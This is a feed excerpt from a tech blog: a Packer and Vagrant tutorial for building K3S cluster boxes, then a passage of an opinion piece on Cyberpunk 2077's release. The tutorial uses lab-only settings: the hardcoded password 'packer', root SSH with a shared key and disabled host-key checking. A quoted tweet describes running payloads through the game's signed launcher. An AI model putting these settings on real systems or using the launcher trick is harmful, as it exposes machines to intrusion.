class="kg-bookmark-thumbnail"><img src="https://en.tferdinand.net/content/images/2020/09/banner_k3s_cluster.jpg" alt="Create Vagrant boxes easily using Packer"></div></a></figure><p>Today, I suggest to see how we can accelerate this creation by building ourselves the box used by Vagrant, preconfigured with our tools. This post is the continuation of the one above. Some notions will not be discussed again.</p><h2 id="what-is-packer">What is Packer?</h2><p>Packer is also a HashiCorp tool, like Vagrant. Its role is to pack (hence its name) virtual machines.</p><p>It allows you to create AWS AMIs, Docker images, VirtualBox virtual machines and so on. You can find the complete list of providers managed by Packer here.</p><p>The main strengths of Packer are :</p><ul><li>The simplicity of the configuration: a simple JSON or HCL file can describe the desired build</li><li>Parallelization: you can create the same image on several providers in parallel, very useful in a multicloud approach</li><li>Reproducibility: It is easy to recreate an OS image from scratch, using only the Packer files, which allows sharing only these files, rather than large images</li></ul><p>Today, we will create a Vagrant box starting from the basic Ubuntu server ISO.</p><h2 id="why-use-packer-to-create-vagrant-boxes">Why use Packer to create Vagrant boxes?</h2><p>If we go back to my previous post, we had seen how to quickly start a K3S cluster with Vagrant. However, on each virtual machine :</p><ul><li>I had to download K3S or Traefik</li><li>I had to do my SSH configuration (for the trust between nodes)</li><li>I couldn&apos;t make sure that the version of K3S and the set of binaries was exactly the same from one run to another. (I&apos;ll come back to this point)</li></ul><p>So, to solve this problem, I will be able to use Packer to create boxes directly configured to meet my needs.</p><p>This will allow me to start my cluster more quickly and not to have to download and configure everything at each launch.</p><h2 id="what-are-the-steps-to-create-the-box">What are the steps to create the box?</h2><p>First, we will create a configuration file for Packer. This file can be written in JSON or in HCL (since recently), the language specific to HashiCorp tools. For this project I arbitrarily chose HCL. Note that JSON can perform exactly the same actions. This file will allow us to indicate the basic ISO that we will use, as well as all the necessary actions until the creation of the box.</p><p>Then we will provide this configuration file as input to Packer which will do the following operations:</p><ul><li>Download the image of the requested OS</li><li>Check the checksum of the image</li><li>Create a virtual machine to launch the image</li><li>Execute the installation commands</li><li>Execute the machine provisioning commands</li><li>Shut down the VM</li><li>Export as Vagrant box</li><li>Delete the temporary VM</li></ul><p>These operations will be done in a completely transparent way, on our side, we will only run one command.</p><h2 id="hands-in-the-mud">Hands in the mud !</h2><p>As a preamble, you can find all the scripts described below on the associated repository :</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/teddy-ferdinand/packer-vagrant-k3s-cluster?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - teddy-ferdinand/packer-vagrant-k3s-cluster</div><div class="kg-bookmark-description">Contribute to teddy-ferdinand/packer-vagrant-k3s-cluster development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Create Vagrant boxes easily using Packer"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">teddy-ferdinand</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/8c41b285f17de22f1f1875b62abe3bc26cc7764238d660cf4ab34536c2eb38d5/teddy-ferdinand/packer-vagrant-k3s-cluster" alt="Create Vagrant boxes easily using Packer"></div></a></figure><p>First, you will need Packer and Vagrant. For Vagrant, I invite you to look at my previous post to know how to install it. Concerning Packer, I invite you to look at the dedicated page on the editor&apos;s website in order to have the most adapted installation to your operating system.</p><p>To make my box, I chose to have three files :</p><pre><code>&#x251C;&#x2500;&#x2500; http
&#x2502;   &#x2514;&#x2500;&#x2500; preseed.cfg
&#x251C;&#x2500;&#x2500; packer_installer.sh
&#x2514;&#x2500;&#x2500; packer.pkr.hcl</code></pre><p>So we have :</p><ul><li>An http directory: this directory will be exposed as a web server by Packer to be able to directly operate a network installation to preconfigure the OS. I will come back to this point in the configuration.</li><li>A packer_installer.sh script : this script contains the basic provisioning of the image, e.g., the installation of K3S, traefik and the deployment of my SSH keys</li><li>A configuration file packer.pkr.hcl : This file is the configuration file that we will use with Packer to create our box. Warning: the .pkr.hcl extension is necessary for Packer to detect the right format; otherwise it will try to process it as JSON.</li></ul><h2 id="the-packer-configuration">The Packer configuration</h2><p>Let&apos;s start with the Packer configuration file. This is the file that will define our box.</p><p>First of all, we have the first section: the source. As its name indicates, this element allows us to indicate which image we have to start from for the build, as well as the basic configuration (login, commands to be executed at boot time, etc.).</p><pre><code class="language-hcl">source &quot;virtualbox-iso&quot; &quot;ubuntu&quot; {
  guest_os_type = &quot;Ubuntu_64&quot;
  iso_url = &quot;http://cdimage.ubuntu.com/ubuntu/releases/bionic/release/ubuntu-18.04.5-server-amd64.iso&quot;
  iso_checksum = &quot;sha256:8c5fc24894394035402f66f3824beb7234b757dd2b5531379cb310cedfdf0996&quot;
  ssh_username = &quot;packer&quot;
  ssh_password = &quot;packer&quot;
  ssh_port= 22
  shutdown_command = &quot;echo &apos;packer&apos; | sudo -S shutdown -P now&quot;
  http_directory = &quot;http&quot;
  guest_additions_mode = &quot;disable&quot;
  boot_command = [
        &quot;&quot;,
        &quot;&quot;,
        &quot;&quot;,
        &quot;/install/vmlinuz&quot;,
        &quot; auto&quot;,
        &quot; console-setup/ask_detect=false&quot;,
        &quot; console-setup/layoutcode=us&quot;,
        &quot; console-setup/modelcode=pc105&quot;,
        &quot; debconf/frontend=noninteractive&quot;,
        &quot; debian-installer=en_US&quot;,
        &quot; fb=false&quot;,
        &quot; initrd=/install/initrd.gz&quot;,
        &quot; kbd-chooser/method=us&quot;,
        &quot; keyboard-configuration/layout=USA&quot;,
        &quot; keyboard-configuration/variant=USA&quot;,
        &quot; locale=en_US&quot;,
        &quot; netcfg/get_domain=vm&quot;,
        &quot; netcfg/get_hostname=packer&quot;,
        &quot; grub-installer/bootdev=/dev/sda&quot;,
        &quot; noapic&quot;,
        &quot; preseed/url=http://{{ .HTTPIP }}:{{ .HTTPPort }}/preseed.cfg&quot;,
        &quot; -- &quot;,
        &quot;&quot;
      ]
}
</code></pre><p><br>In this part, we find :</p><ul><li>The base image: Ubuntu 18.04.5</li><li>The checksum of the image, this will allow Packer to control the integrity of the image after its download</li><li>The logins and passwords to use in SSH (which will be used in the second part)<br>Which command should be run to shut down the machine properly</li><li>The http directory, which allows exposing a preseed file that carries the basic configuration of my image. You can find it on line 32.</li><li>The fact that I disable the installation of the guests additions. The guests additions allow a better integration between the host and the VM, in our case, I don&apos;t need them, so I might as well not install them.</li><li>Finally, we find the commands launched at boot time. These commands will be launched in &quot;emulation&quot; mode. This means that Packer will emulate a keyboard to type these commands in your virtual machine.</li></ul><p>Concerning the commands launched at build time, I was inspired by a repository containing basic Packer configurations:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/geerlingguy/packer-boxes?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - geerlingguy/packer-boxes: Jeff Geerling&#x2019;s Packer build configurations for Vagrant boxes.</div><div class="kg-bookmark-description">Jeff Geerling&#x2019;s Packer build configurations for Vagrant boxes. - GitHub - geerlingguy/packer-boxes: Jeff Geerling&#x2019;s Packer build configurations for Vagrant boxes.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Create Vagrant boxes easily using Packer"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">geerlingguy</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/2934f457b2515f6b7f6ce775b8b6ca418f26f1f4fbb268b56277ef1567c6a567/geerlingguy/packer-boxes" alt="Create Vagrant boxes easily using Packer"></div></a></figure><p>Still in this same configuration file, we have a second block, the &quot;builder&quot;. As its name indicates, the role of this block is to build our box. Let&apos;s see its content.</p><pre><code class="language-hcl">build {
    sources = [&quot;source.virtualbox-iso.ubuntu&quot;]

    provisioner &quot;file&quot;{
        sources = [&quot;.ssh/id_rsa&quot;, &quot;.ssh/id_rsa.pub&quot;]
        destination = &quot;/tmp/&quot;
    }

    provisioner &quot;shell&quot;{
        script = &quot;./packer_installer.sh&quot;
        execute_command = &quot;echo &apos;packer&apos; | sudo -S -E sh -c &apos;{{ .Vars }} {{ .Path }}&apos;&quot;
    }

    post-processor &quot;vagrant&quot; {
        keep_input_artifact = false
        provider_override = &quot;virtualbox&quot;
    }
}</code></pre><p>Those who are used to HCL will see that the source is a direct reference. This means that Packer natively solves a dependency link between the two elements.</p><p>Then we can see that I use &quot;provisionners,&quot; the role of these elements is precisely to do the provisioning, there are dozens. It is for example possible to use Ansible to do its configuration.</p><p>You can find the complete list of provisioners here: <a href="https://www.packer.io/docs/provisioners?ref=en.tferdinand.net">https://www.packer.io/docs/provisioners</a>.</p><p>For my part, I chose to use two of them:</p><ul><li>I copy my SSH keys that I have generated in my virtual machine</li><li>I then run an installation script that I made, note the invocation of sudo for the launch. By default Packer runs the commands via the user specified in sources.</li></ul><p>Finally, I have a &quot;post-processor&quot;, the role of this element is to export my box once the configuration of my virtual machine is finished. In my case, the export is Vagrant, which means that packer will create a box vagrant from the Virtualbox virtual machine. As for providers and provisioners, there are many post-processors: <a href="https://www.packer.io/docs/post-processors?ref=en.tferdinand.net">https://www.packer.io/docs/post-processors</a></p><h3 id="the-installation-script">The installation script</h3><p>As we have seen above, I have a small Shell script that is invoked to perform the provisioning of my machine. Here is the content of this script, which is quite basic.</p><pre><code class="language-bash">#!/bin/sh
# Deploy keys to allow all nodes to connect each others as root
mkdir /root/.ssh/
mv /tmp/id_rsa*  /root/.ssh/

chmod 400 /root/.ssh/id_rsa*
chown root:root  /root/.ssh/id_rsa*

cat /root/.ssh/id_rsa.pub &gt;&gt; /root/.ssh/authorized_keys
chmod 400 /root/.ssh/authorized_keys
chown root:root /root/.ssh/authorized_keys

# Install updates and curl
apt update
apt install -y curl
# Apt cleanup.
apt autoremove -y
apt update

#  Blank netplan machine-id (DUID) so machines get unique ID generated on boot.
truncate -s 0 /etc/machine-id
rm /var/lib/dbus/machine-id
ln -s /etc/machine-id /var/lib/dbus/machine-id

# Download k3s
curl -L https://get.k3s.io -o /home/packer/k3s
chmod +x /home/packer/k3s

# Download Traefik
curl -L https://github.com/containous/traefik/releases/download/v2.2.11/traefik_v2.2.11_linux_amd64.tar.gz -o /home/packer/traefik.tar.gz
cd /home/packer
tar xvfz ./traefik.tar.gz
rm ./traefik.tar.gz
chmod +x /home/packer/traefik</code></pre><p>At first, we can find the deployment of my SSH key. When we were running Vagrant, it was him who did this installation. Now Packer does it for us. This will also allow us to connect directly using these keys.</p><p>Then I update my packages and install curl, because the image I use is a &quot;minimal&quot; image without this package. Then I clean up the useless packages. Besides the aspect of a clean installation, it allows reducing the size of my box.</p><p>A small cleaning is then done so that our machine does not have an identifier linked to it, a very important point for Vagrant, without which we can have conflicts between our virtual machines.</p><p>Finally, I download K3S and Traefik, which I put in /home/packer. This will allow Packer to use them directly.</p><h3 id="the-preseed-file">The preseed file</h3><p>This file is probably the most &quot;raw&quot;, but very important, because it is the one that will perform the installation of the base of our machine.</p><pre><code class="language-cfg">
d-i base-installer/kernel/override-image string linux-server
d-i clock-setup/utc boolean true
d-i clock-setup/utc-auto boolean true
d-i finish-install/reboot_in_progress note
d-i grub-installer/only_debian boolean true
d-i grub-installer/with_other_os boolean true
d-i partman-auto/disk string /dev/sda
d-i partman-auto-lvm/guided_size string max
d-i partman-auto/choose_recipe select atomic
d-i partman-auto/method string lvm
d-i partman-lvm/confirm boolean true
d-i partman-lvm/confirm boolean true
d-i partman-lvm/confirm_nooverwrite boolean true
d-i partman-lvm/device_remove_lvm boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
d-i partman/confirm_write_new_label boolean true
d-i pkgsel/include string openssh-server cryptsetup build-essential libssl-dev libreadline-dev zlib1g-dev linux-source dkms nfs-common
d-i pkgsel/install-language-support boolean false
d-i pkgsel/update-policy select none
d-i pkgsel/upgrade select full-upgrade
d-i time/zone string UTC
tasksel tasksel/first multiselect standard, ubuntu-server

d-i console-setup/ask_detect boolean false
d-i keyboard-configuration/layoutcode string us
d-i keyboard-configuration/modelcode string pc105
d-i debian-installer/locale string en_US.UTF-8

# Create packer user account.
d-i passwd/user-fullname string packer
d-i passwd/username string packer
d-i passwd/user-password password packer
d-i passwd/user-password-again password packer
d-i user-setup/allow-password-weak boolean true
d-i user-setup/encrypt-home boolean false
d-i passwd/user-default-groups packer sudo
d-i passwd/user-uid string 900
</code></pre><p>These include, but are not limited to:</p><ul><li>The configuration of the language and the keyboard layout</li><li>The partitioning of my disks</li><li>The basic packages to install</li><li>The creation of my user &quot;packer</li></ul><h2 id="lets-launch-it-all">Let&apos;s launch it all!</h2><p>Once we have all our files, we can launch the construction of my Vagrant box with packer with a simple :</p><pre><code>packer build packer.pkr.hcl</code></pre><p>As you can see below, this takes a few minutes and will perform all the actions I mentioned earlier.</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/Capture-du-2021-01-11-08-17-33-1.png" width="1270" height="1291" loading="lazy" alt="Create Vagrant boxes easily using Packer" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/Capture-du-2021-01-11-08-17-33-1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/Capture-du-2021-01-11-08-17-33-1.png 1000w, https://en.tferdinand.net/content/images/2022/01/Capture-du-2021-01-11-08-17-33-1.png 1270w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/Capture-du-2021-01-11-08-17-54-1.png" width="1262" height="683" loading="lazy" alt="Create Vagrant boxes easily using Packer" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/Capture-du-2021-01-11-08-17-54-1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/Capture-du-2021-01-11-08-17-54-1.png 1000w, https://en.tferdinand.net/content/images/2022/01/Capture-du-2021-01-11-08-17-54-1.png 1262w" sizes="(min-width: 720px) 720px"></div></div></div></figure><p>Once it is finished, we have a box &quot;packer_ubuntu_virtualbox.box&quot; in our current directory. During the execution, we can see the Virtualbox window, this is a choice I made. It is possible to disable its display by adding</p><pre><code>headless = true</code></pre><p>in my source.</p><h2 id="using-this-box-in-vagrant">Using this box in Vagrant</h2><p>Now that my box is created, I can use it in Vagrant. The basic scripts are very similar to the original ones, except that :</p><ul><li>I don&apos;t start from a public Ubuntu box anymore, but from my local box</li><li>I don&apos;t need to deploy my RSA keys anymore</li><li>I use the connection via the RSA key instead of the native vagrant login</li><li>I don&apos;t need to download K3S and Traefik anymore</li><li>I disable the synchronization of the Vagrant directory that I don&apos;t use, since it requires the use of the &quot;guests additions&quot; that I haven&apos;t installed</li></ul><p>So here is the file in question :</p><pre><code class="language-hcl">MASTER_COUNT = 3
NODE_COUNT = 3
IMAGE = &quot;packer_ubuntu_virtualbox.box&quot;

Vagrant.configure(&quot;2&quot;) do |config|

  (1..MASTER_COUNT).each do |i|
    config.vm.define &quot;kubemaster#{i}&quot; do |kubemasters|
      kubemasters.vm.box = IMAGE
      kubemasters.vm.hostname = &quot;kubemaster#{i}&quot;
      kubemasters.vm.network  :private_network, ip: &quot;10.0.0.#{i+10}&quot;
      kubemasters.vm.provision &quot;shell&quot;, path: &quot;scripts/master_install.sh&quot;
      kubemasters.ssh.username = &quot;root&quot;
      kubemasters.ssh.private_key_path = &quot;.ssh/id_rsa&quot;
      kubemasters.vm.synced_folder &apos;.&apos;, &apos;/vagrant&apos;, disabled: true
    end
  end

  (1..NODE_COUNT).each do |i|
    config.vm.define &quot;kubenode#{i}&quot; do |kubenodes|
      kubenodes.vm.box = IMAGE
      kubenodes.vm.hostname = &quot;kubenode#{i}&quot;
      kubenodes.vm.network  :private_network, ip: &quot;10.0.0.#{i+20}&quot;
      kubenodes.vm.provision &quot;shell&quot;, path: &quot;scripts/node_install.sh&quot;
      kubenodes.ssh.username = &quot;root&quot;
      kubenodes.ssh.private_key_path = &quot;.ssh/id_rsa&quot;
      kubenodes.vm.synced_folder &apos;.&apos;, &apos;/vagrant&apos;, disabled: true
    end
  end

  config.vm.define &quot;front_lb&quot; do |traefik|
      traefik.vm.box = IMAGE
      traefik.vm.hostname = &quot;traefik&quot;
      traefik.vm.network  :private_network, ip: &quot;10.0.0.30&quot;   
      traefik.vm.provision &quot;file&quot;, source: &quot;./scripts/traefik/dynamic_conf.toml&quot;, destination: &quot;/tmp/traefikconf/dynamic_conf.toml&quot;
      traefik.vm.provision &quot;file&quot;, source: &quot;./scripts/traefik/static_conf.toml&quot;, destination: &quot;/tmp/traefikconf/static_conf.toml&quot;
      traefik.vm.provision &quot;shell&quot;, path: &quot;scripts/lb_install.sh&quot;
      traefik.vm.network &quot;forwarded_port&quot;, guest: 6443, host: 6443
      traefik.ssh.username = &quot;root&quot;
      traefik.ssh.private_key_path = &quot;.ssh/id_rsa&quot;
      traefik.vm.synced_folder &apos;.&apos;, &apos;/vagrant&apos;, disabled: true
  end
end
</code></pre><p>As you can see, no huge changes here from my original script.</p><p>The real changes are in the Vagrant deployment scripts.</p><h2 id="k3s-installation">K3S installation</h2><h3 id="installing-the-master">Installing the master</h3><pre><code class="language-bash">#!/bin/sh

# Add current node in  /etc/hosts
echo &quot;127.0.1.1 $(hostname)&quot; &gt;&gt; /etc/hosts

# Get current IP adress to launch k3S
current_ip=$(/sbin/ip -o -4 addr list enp0s8 | awk &apos;{print $4}&apos; | cut -d/ -f1)

# If we are on first node, launch k3s with cluster-init, else we join the existing cluster
if [ $(hostname) = &quot;kubemaster1&quot; ]
then
    export INSTALL_K3S_EXEC=&quot;server --cluster-init --tls-san $(hostname) --bind-address=${current_ip} --advertise-address=${current_ip} --node-ip=${current_ip} --no-deploy=traefik&quot;
    export INSTALL_K3S_VERSION=&quot;v1.16.15+k3s1&quot;
    sh /home/packer/k3s
else
    echo &quot;10.0.0.11  kubemaster1&quot; &gt;&gt; /etc/hosts
    scp -o StrictHostKeyChecking=no root@kubemaster1:/var/lib/rancher/k3s/server/token /tmp/token
    export INSTALL_K3S_EXEC=&quot;server --server https://kubemaster1:6443 --token-file /tmp/token --tls-san $(hostname) --bind-address=${current_ip} --advertise-address=${current_ip} --node-ip=${current_ip} --no-deploy=traefik&quot;
    export INSTALL_K3S_VERSION=&quot;v1.16.15+k3s1&quot;
    sh /home/packer/k3s
fi

# Wait for node to be ready and disable deployments on it
sleep 15
kubectl taint --overwrite node $(hostname) node-role.kubernetes.io/master=true:NoSchedule
</code></pre><p>As you can see, no more key deployment, no more K3S download. I just configure my host and launch directly K3S which is already in my box.</p><p>The command line arguments (INSTALL_K3S_EXEC) are exactly the same.</p><div class="kg-card kg-callout-card kg-callout-card-green"><div class="kg-callout-emoji">&#x26A0;&#xFE0F;</div><div class="kg-callout-text">Note on the K3S version<br><br>You may notice that I set the K3S version using the INSTALL_K3S_VERSION environment variable, this is because recent versions of K3S use a default RSA key authentication which I could not get to work with Traefik. Even with the right password, I couldn&apos;t get the basic authentication to work either. So I chose to point to the version I used last September for this post.<br><br>I&apos;ll probably do a post on this point when I&apos;ve found a solution.</div></div><h3 id="installation-of-worker-nodes">Installation of worker nodes</h3><pre><code class="language-bash">#!/bin/sh
# Add current node in  /etc/hosts
echo &quot;127.0.1.1 $(hostname)&quot; &gt;&gt; /etc/hosts

# Add kubemaster1 in  /etc/hosts
echo &quot;10.0.0.11  kubemaster1&quot; &gt;&gt; /etc/hosts

# Get current IP adress to launch k3S
current_ip=$(/sbin/ip -o -4 addr list enp0s8 | awk &apos;{print $4}&apos; | cut -d/ -f1)

# Launch k3s as agent
scp -o StrictHostKeyChecking=no root@kubemaster1:/var/lib/rancher/k3s/server/token /tmp/token
export INSTALL_K3S_EXEC=&quot;agent --server https://kubemaster1:6443 --token-file /tmp/token --node-ip=${current_ip}&quot;
export INSTALL_K3S_VERSION=&quot;v1.16.15+k3s1&quot;
sh /home/packer/k3s
</code></pre><p>We find here the same logic: no more download, basic configuration of the host and direct launch of K3S.</p><h3 id="traefik-installation">Traefik installation</h3><p>The Traefik virtual machine is reduced to launching the binary directly by using the configurations pushed by Vagrant.</p><pre><code class="language-bash">#!/bin/bash
# Run Traefik as a front load balancer
/home/packer/traefik --configFile=/tmp/traefikconf/static_conf.toml &amp;&gt; /dev/null&amp;
</code></pre><h2 id="we-run-the-whole-thing">We run the whole thing</h2><p>So we have everything we need to launch the deployment with Vagrant with a simple</p><pre><code>vagrant up</code></pre><p>As for my previous post, after a few minutes my cluster is online. It is possible to check that everything works well with the following commands:</p><pre><code class="language-bash">source ./scripts/configure_kubectl.sh
kubectl get nodes 
</code></pre><p>You should get a return similar to this one:</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-5.png" class="kg-image" alt="Create Vagrant boxes easily using Packer" loading="lazy" width="911" height="287" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-5.png 600w, https://en.tferdinand.net/content/images/2022/01/image-5.png 911w" sizes="(min-width: 720px) 720px"></figure><h3 id="to-conclude">To conclude</h3><p>This article stays on a very basic use of Packer. The tool is very powerful and allows you to have multiprovisioning approaches in a very simple way. Moreover, the strength of Packer, like most of the infra as code tools, is its reproducibility: it is very easy to recreate identical base images without having to share files of several hundred MB.</p><p>Like many of HashiCorp&apos;s tools, the language is quite high level and very accessible. As for me, it took me an hour to make my first VM from scratch a few years ago using Packer.</p><p>Don&apos;t hesitate to react via the comments if you have any questions or remarks !</p>]]></content:encoded></item><item><title><![CDATA[Cyberpunk 2077: Analysis of an agile method failure]]></title><description><![CDATA[<p>On December 10th, one of the most anticipated games of the year was released: Cyberpunk 2077.</p><p>Personally, I enjoy playing it, but it&#x2019;s not the case for everyone.</p><p>With an outside look of an IT professional, I suggest you see today the &#x201C;mistakes&#x201D; that I think</p>]]></description><link>https://en.tferdinand.net/cyberpunk-2077-analysis-of-an-agile-method-failure/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56b</guid><category><![CDATA[actuality]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Point of view]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Thu, 24 Dec 2020 06:20:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/20201218202529_1-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/20201218202529_1-1.jpg" alt="Cyberpunk 2077: Analysis of an agile method failure"><p>On December 10th, one of the most anticipated games of the year was released: Cyberpunk 2077.</p><p>Personally, I enjoy playing it, but it&#x2019;s not the case for everyone.</p><p>With an outside look of an IT professional, I suggest you see today the &#x201C;mistakes&#x201D; that I think were made in this project, and how some mistakes could have been avoided. This article is not about the game itself, but rather about the organizational and technical aspects.</p><h2 id="a-little-background">A little background</h2><h3 id="the-studio">The studio</h3><p>Cyberpunk is developed by CD Projeckt Red, a rather small Polish studio (on the scale of the titans of the present industry). It is a company of about 800 people (according to their website). It is the studio behind the critically acclaimed The Witcher franchise, most recently adapted into a series by Netflix.</p><p>It is also the GOG.com platform, bought a few years ago to sell games from independent studios. GOG stands out for its model promoting the fact of selling games without DRM (copy protection) which can sometimes cause problems.</p><p>It is a company that historically worked on a single license: The Witcher.</p><h3 id="the-game">The game</h3><p>Development of this game would have started in 2012, according to a press release at the time. The first teaser released in 2013 not specifying a release date.</p><p>Developed a lot in the background, little information is released over the years, we start to hear about the game again at the E3 of 2018 (the video game mecca). A first video offering an overview of the game is then presented.</p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/vjF9GgrY9c0?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></figure><p>Initially scheduled for April 16, 2020, the release will be postponed 3 times: first on September 17, 2020, then on October 27, 2020, to finally release on December 10, 2020.</p><p>The development of the game would have cost about 270 million euros, one of the most expensive in the video game industry, similar in size to GTA V, for example.</p><p>However, its release was quite catastrophic for the image of the studio: the game seems poorly finished, one feels that some elements have been &#x201C;botched&#x201D;. Worse, the game is unplayable on PS4 and Xbox One, which were the existing consoles at the beginning of the development. The game is punctuated by a lot of bugs more or less blocking.</p><p>Also, the game doesn&#x2019;t really look like the trailers presented earlier, it seems much more rigid, the player having much less freedom than announced, especially on the character customization part.</p><p>This had several impacts:</p><ul><li>Removal of the game from online stores</li><li>Massive refund campaign</li><li>Huge impact on the company&#x2019;s image</li><li>Impact on the company&#x2019;s stock market valuation</li></ul><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-2.png" class="kg-image" alt="Cyberpunk 2077: Analysis of an agile method failure" loading="lazy" width="642" height="485" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-2.png 600w, https://en.tferdinand.net/content/images/2022/01/image-2.png 642w"></figure><h2 id="agility-don%E2%80%99t-know-it">Agility, don&#x2019;t know it!</h2><p>I&#x2019;m not going to present all the concepts of agility here, but rather talk about one of the basic objectives: to bring the business and the developers closer together so that each can take into account the constraints and needs of the other.</p><p>What is clear in the history of the development of this game is the total desynchronization of the two parties. The successive postponements are a typical example, which highlights the fact that the business is not aware of the remaining workload or that it has been greatly underestimated.</p><p>In the first case, it shows that the approach taken is not consistent to deliver a finished product, in the second case, it may come from a lack of guidance.</p><p>In an agile/DevOps world, measuring is key. Normally, we are able to roughly estimate the velocity we can achieve in a sprint, although mistakes can happen.</p><blockquote>&#x201D;We ignored the signals about the need for additional time to refine the game on the base last-gen consoles. It was the wrong approach and against our business philosophy.&#x201D;</blockquote><p>Yet, we can see in the official releases that alarms were raised about the developers needing more time to release a finished product.</p><p>Even if one can easily understand the &#x201C;deadline&#x201D; of December 10 (2 weeks before Christmas), it is a pity that this is such a strong deadline that one ignores all the signals that indicate that one is heading for the wall.</p><h2 id="the-importance-of-testing">The importance of testing</h2><p>Releasing a game on four consoles simultaneously and on computers, as well as on streaming platforms, is not as simple as it seems:</p><ul><li>Multiple technical specifications</li><li>Specificity of the SDK of each console</li><li>Different processor architectures</li></ul><p>CD Projekt Red admitted that they did not test their game enough on consoles and focused on the PC.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-3.png" class="kg-image" alt="Cyberpunk 2077: Analysis of an agile method failure" loading="lazy" width="1600" height="900" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-3.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/image-3.png 1000w, https://en.tferdinand.net/content/images/2022/01/image-3.png 1600w" sizes="(min-width: 720px) 720px"></figure><p>The concern is that even on a PC, some bugs and anomalies are very complicated to understand, we could mention:</p><ul><li>The non-support of SMT procedures on AMD processors: just incomprehensible that the tests are conclusive, to have tested on the config we have at home (AMD Ryzen 1600 + Nvidia GTX 1070), we had a 40% gain of additional performance (about 20 FPS)! (This point has been corrected since version 1.05)</li><li>The default QWERTY configuration and the non-ergonomic controls in general</li><li>The elements of the scenery that float in the air (phones for example)&#x2026;</li><li>The &#x201C;Lorem ipsum&#x201D; that hangs in some languages, these placeholders are normally used during development to simulate a text fill</li></ul><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-4.png" class="kg-image" alt="Cyberpunk 2077: Analysis of an agile method failure" loading="lazy" width="652" height="619" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-4.png 600w, https://en.tferdinand.net/content/images/2022/01/image-4.png 652w"></figure><ul><li>Bugs with subtitles that remain permanently displayed on the screen or object tooltips</li><li>Vehicles that appear under the map</li></ul><p>And I could continue the list for a long time&#x2026; Knowing that these are only the bugs that I could see on my side with a recent PC!</p><h2 id="and-the-security-of-all-this">And the security of all this?</h2><p>Cyberpunk is launched via a launcher, which fortunately can be bypassed when you have it, like me, on Steam. The problem is that this launcher is (like many launchers) a huge security flaw, allowing to easily execute arbitrary code if compromised&#x2026;</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Red Teamers - why not use <a href="https://twitter.com/hashtag/Cyberpunk2077?src=hash&amp;ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">#Cyberpunk2077</a>&apos;s signed launcher to execute your code? Simply edit launcher-configuration.json and copy your payload anywhere within the root directory &#x1F609; <a href="https://t.co/M0bJ2tIDKX?ref=en.tferdinand.net">pic.twitter.com/M0bJ2tIDKX</a></p>&#x2014; Lloyd Davies (@LloydLabs) <a href="https://twitter.com/LloydLabs/status/1336866373331546112?ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">December 10, 2020</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p>As far as hacking is concerned, we&#x2019;re in trouble &#x201C;script kiddies&#x201D; here&#x2026;</p><p>But since we don&#x2019;t have a DevOps approach, I won&#x2019;t ask for DevSecOps!</p><h2 id="what-could-have-limited-this-disaster">What could have limited this disaster</h2><p>I know it&#x2019;s easy to criticize after the fact; however, I&#x2019;d like to bring a few points that might have helped limit this disaster.</p><h3 id="limiting-the-release-to-pc-at-first">Limiting the release to PC at first</h3><p>This is the strategy used by Rockstar for its games, release first on console, then a few months later on PC.</p><p>This allows having several gains:</p><ul><li>Bugs are located on fewer platforms</li><li>It allows focusing its development and testing on fewer platforms</li><li>It allows to potentially sell several copies of the same game since players are not necessarily ready to wait several months</li></ul><p>CD Projekt Red is a small studio, to spread out on so many platforms in parallel is risky.</p><h3 id="not-selling-the-perfect-game-in-all-aspects">Not selling the perfect game in all aspects</h3><p>The game has clearly been oversold, announced several times as &#x201C;fully playable, but needs to be refined&#x201D;, we find the aspect of desynchronization between business and developers, where we first sell things and then look at how to develop them.</p><p>This is something I&#x2019;ve often experienced in IT 